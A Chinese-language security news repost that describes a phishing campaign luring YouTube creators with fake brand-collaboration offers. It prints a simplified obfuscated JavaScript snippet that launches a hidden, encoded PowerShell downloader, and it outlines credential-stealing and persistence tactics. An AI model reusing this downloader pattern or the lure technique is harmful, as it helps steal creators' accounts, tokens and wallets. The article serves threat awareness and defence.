YouTube 创作者因品牌合作者请求使用 Clickflix 技术而遭受攻击

admin 2025年4月2日23:24:09评论8 views字数 1184阅读3分56秒阅读模式
YouTube 创作者因品牌合作者请求使用 Clickflix 技术而遭受攻击

关键词

网络钓鱼

YouTube 创作者因品牌合作者请求使用 Clickflix 技术而遭受攻击

一种被称为“Clickflix 技术”的复杂网络钓鱼活动已经出现,它通过看似合法的品牌合作请求瞄准 YouTube 内容创作者。

这种新的攻击媒介利用了创作者渴望获得赞助协议的心理,将恶意软件负载伪装成合作文件。

网络犯罪分子通过电子邮件或社交媒体发起联系,冒充知名品牌的营销代表,提供利润丰厚的交易,要求创建者审查托管在受感染域或云存储上的“活动材料”。

攻击者通常会接触订阅者数量在 10,000 到 500,000 之间的创作者,精心编写引用创作者内容风格和之前赞助情况的消息,以建立可信度。

点击恶意链接后,创建者会被引导至模仿流行文件共享服务的专业登陆页面,系统会提示他们下载看似 PDF 合同或活动简介的内容。

CloudSek 的研究人员于 2025 年 3 月初发现了这一活动,并指出该恶意软件采用了多阶段感染过程,旨在逃避传统的安全解决方案。

YouTube 创作者因品牌合作者请求使用 Clickflix 技术而遭受攻击

他们的分析显示,游戏、技术评论和生活方式领域有超过 2,300 名创作者成为攻击目标,其中约 18% 的目标被成功攻击。

这次攻击利用社会工程学原理与技术欺骗相结合,通常包括时间敏感的提议,以迫使创作者匆忙做出决定。

受害者报告收到了引用他们制作的特定视频的定制消息,这表明威胁行为者在发起联系之前进行了大量的侦察工作。

感染机制利用 JavaScript 混淆

该恶意软件的主要感染媒介采用了复杂的JavaScript下载程序,当受害者打开看似标准 HTML 预览页面时,该下载程序就会执行。

YouTube 创作者因品牌合作者请求使用 Clickflix 技术而遭受攻击

初始有效载荷采用了多层混淆,最后阶段类似于以下简化的示例:

const decoderKey = navigator.userAgent.slice(0,8);eval(function(p,a,c,k,e,d){   /* heavily obfuscated PowerShell downloader */   return p;}('powershell -w hidden -e JGNsaWVudCA9...'))

这段混淆的代码最终会触发一个 PowerShell 命令,该命令会下载一个针对浏览器数据的窃取程序,特别是 YouTube Studio 凭证、Google身份验证令牌和加密货币钱包信息。

该恶意软件通过修改 Windows 注册表和使用“GoogleUpdateTask”等无害名称的计划任务来建立持久性,以避免在常规系统检查期间被发现。

此次攻击表明,针对内容创作者的攻击活动日益复杂,由于内容创作者的盈利潜力和可接触受众网络的能力,他们越来越成为有价值的目标。

来源:https://cybersecuritynews.com/youtube-creators-under-attack-via-brand-collaborators-requests/

  END  

原文始发于微信公众号(安全圈):【安全圈】YouTube 创作者因品牌合作者请求使用 Clickflix 技术而遭受攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月2日23:24:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   YouTube 创作者因品牌合作者请求使用 Clickflix 技术而遭受攻击http://cn-sec.com/archives/3891456.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息